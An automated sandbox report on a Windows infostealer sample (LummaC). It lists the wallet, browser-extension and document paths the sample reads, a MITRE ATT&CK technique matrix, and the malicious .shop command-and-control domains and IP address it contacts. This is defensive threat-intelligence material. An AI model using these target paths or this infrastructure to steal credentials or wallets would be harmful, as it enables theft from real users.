          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: Yara matchFile source: Process Memory Space: LwnI84BBtb.exe PID: 7396, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          Process Injection
          11
          Virtualization/Sandbox Evasion
          1
          OS Credential Dumping
          121
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          21
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          PowerShell
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory11
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol31
          Data from Local System
          2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
          Deobfuscate/Decode Files or Information
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin Shares2
          Clipboard Data
          113
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS11
          File and Directory Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Software Packing
          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          LwnI84BBtb.exe41%VirustotalBrowse
          LwnI84BBtb.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          strollheavengwu.shop1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://support.microsof0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          tolerateilusidjukl.shop1%VirustotalBrowse
          incredibleextedwj.shop1%VirustotalBrowse
          shortsvelventysjo.shop1%VirustotalBrowse
          https://strollheavengwu.shop/api11%VirustotalBrowse
          liabilitynighstjsko.shop1%VirustotalBrowse
          shatterbreathepsw.shop1%VirustotalBrowse
          demonstationfukewko.shop1%VirustotalBrowse
          productivelookewr.shop1%VirustotalBrowse
          alcojoldwograpciw.shop1%VirustotalBrowse
          https://strollheavengwu.shop/1%VirustotalBrowse
          https://strollheavengwu.shop:443/api11%VirustotalBrowse
          strollheavengwu.shop1%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          strollheavengwu.shop
          104.21.15.198
          truetrueunknown
          NameMaliciousAntivirus DetectionReputation
          incredibleextedwj.shoptrueunknown
          shortsvelventysjo.shoptrueunknown
          tolerateilusidjukl.shoptrueunknown
          liabilitynighstjsko.shoptrueunknown
          https://strollheavengwu.shop/apifalseunknown
          shatterbreathepsw.shoptrueunknown
          demonstationfukewko.shoptrueunknown
          productivelookewr.shoptrueunknown
          strollheavengwu.shoptrueunknown
          alcojoldwograpciw.shoptrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zLwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            https://duckduckgo.com/chrome_newtabLwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://strollheavengwu.shop/9LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B05000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://duckduckgo.com/ac/?q=LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoLwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.rootca1.amazontrust.com/rootca1.crl0LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://upx.sf.netAmcache.hve.3.drfalse
                        high
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.rootca1.amazontrust.com0:LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016LwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17LwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.ecosia.org/newtab/LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ac.ecosia.org/autocomplete?q=LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://x1.c.lencr.org/0LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://x1.i.lencr.org/0LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.microsofLwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://support.mozilla.org/products/firefoxgro.allLwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://strollheavengwu.shop:443/apiLwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1752809021.0000000001B08000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94LwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://strollheavengwu.shop/LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001A7C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.15.198
                                                strollheavengwu.shopUnited States
                                                13335CLOUDFLARENETUStrue
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1429106
                                                Start date and time:2024-04-20 22:06:06 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 24s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:LwnI84BBtb.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:49293c745f0fd48ab2784cad7cc5a0ac.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@3/9@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 38
                                                • Number of non-executed functions: 109
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                22:06:57API Interceptor8x Sleep call for process: LwnI84BBtb.exe modified
                                                22:07:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.21.15.198file.exeGet hashmaliciousLummaCBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  strollheavengwu.shopfile.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSKvS2rT08PQ.exeGet hashmaliciousBlank Grabber, Njrat, Umbral StealerBrowse
                                                  • 104.26.0.5
                                                  SecuriteInfo.com.Win64.Malware-gen.26781.23689.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.81.28
                                                  SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 104.26.5.15
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 104.26.4.15
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.177.98
                                                  2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                  • 172.67.129.243
                                                  RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.86.106
                                                  https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94dGet hashmaliciousUnknownBrowse
                                                  • 172.67.74.40
                                                  jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                  • 104.21.4.208
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 104.21.15.198
                                                  pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  hta.htaGet hashmaliciousUnknownBrowse
                                                  • 104.21.15.198
                                                  2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                  • 104.21.15.198
                                                  RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.15.198
                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                  • 104.21.15.198
                                                  No context
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):1.0018866717565438
                                                  Encrypted:false
                                                  SSDEEP:192:5OIO0jAL/AQ04DmIwsOoTjldFPzuiFVZ24IO8QF9:xNAjAr4Dm9sBjlzuiFVY4IO8a
                                                  MD5:306E291584A39DC703555859AB08CC00
                                                  SHA1:C7402A8235BDAE7A94E378A6C31CA7B1289FB0F7
                                                  SHA-256:19DEBEFB6BD525DE9AB3357709CC4E21A4C82676CFA98D5B7BC71246F3FD442D
                                                  SHA-512:770EA2704695ADA249DAD55C5C594F570E032D8747FD76CF32980C56A3C52C0683ECE9F89BFA321A8D48AFE126CEEF9BA9080B48FC4B46D1930B9E3A22E03AA6
                                                  Malicious:false
                                                  Reputation:low
